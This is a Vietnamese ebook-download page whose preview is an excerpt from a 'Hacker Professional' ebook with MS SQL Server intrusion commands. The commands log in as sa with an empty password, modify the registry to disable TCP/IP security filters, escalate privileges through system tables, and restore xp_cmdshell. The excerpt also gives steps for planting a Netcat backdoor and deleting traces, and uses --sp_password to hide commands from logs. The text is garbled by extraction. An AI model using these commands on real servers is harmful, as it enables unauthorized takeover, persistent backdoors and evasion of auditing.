Đang chuẩn bị liên kết để tải về tài liệu:
Hacker Professional Ebook part 237
Đang chuẩn bị nút TẢI XUỐNG, xin hãy chờ
Tải xuống
Tham khảo tài liệu 'hacker professional ebook part 237', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | dbo.test as select from master.dbo.sysxlogins exec sp_msdropretry xx update sysusers set sid 0x01 where name dbo xx exec sp_msdropretry xx update dbo.test set xstatus 18 where name BUILTIN ADMINISTRATORS xx exec sp_executesql N drop view dbo.test --sp_password Thay đổi mức quyền C osql -S xxx.xxx.xxx.xxx -U sa -P -Q exec master.xp_regwrite HKEY_LOCAL_MACHINE SOFTwARE Microsoft MSSQLServer Providers SQLOLEDB AllowInProcess REG_DWORD 1 --sp_password C osql -S xxx.xxx.xxx.xxx -U sa -P -Q exec master.xp_regwrite HKEY_LOCAL_MACHINE SOFTwARE Microsoft MSSQLServer Providers SQLOLEDB DisallowAdhocAccess REG_DWO RD 0--sp_password Xoá bỏ và khôi phục Log và firewall trong MS SQL C osql -S xxx.xxx.xxx.xxx -U sa -P -Q exec master.xp_regdeletevalue HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Ser vices Tcpip Parameters EnableSecurityFilters --sp_password C osql -S xxx.xxx.xxx.xxx -U sa -P -Q exec master.xp_regwrite HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Ser vices Tcpip Parameters EnableSecurityFilters RE G_DWORD 0--sp_password Cho phép sử dụng MASTER.XP_CMDSHELL ALLOW UPDaTeS C osql -S xxx.xxx.xxx.xxx -U sa -P -Q select from openrowset sqloledb server Digital uid BUILTIN Administrators pwd set fmtonly off select 1 exec master.sp_addextendedproc xp_cmd xpsql70.dll exec sp_configure allow updates 1 reconfigure with override --sp_password 2. Đưa thêm các thông tin _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ Cộng thêm một quyền quản trị mới Xem tat ca các nhóm của user 3. Đưa backdoor lên server Tạo kịch bản trên server vào thư mục C WINDOWS system32 Kiểm tra xem đã upload kịch bản thành công chưa C osql -S xxx.xxx.xxx.xxx -U sa -P -Q exec master.xp_cmdshell dir uds --sp_password Đọc nội dung một file kịch bản C osql -S xxx.xxx.xxx.xxx -U sa -P -Q exec master.xp_cmdshell type uds --sp_password Thực hiện kịch bản và Down backdoor Netcat về Xoá kịch bản đi vì trong đó có thông tin về host của mình C osql -S xxx.xxx.xxx.xxx -U sa -P -Q exec master.xp_cmdshell del uds --sp_password Chay .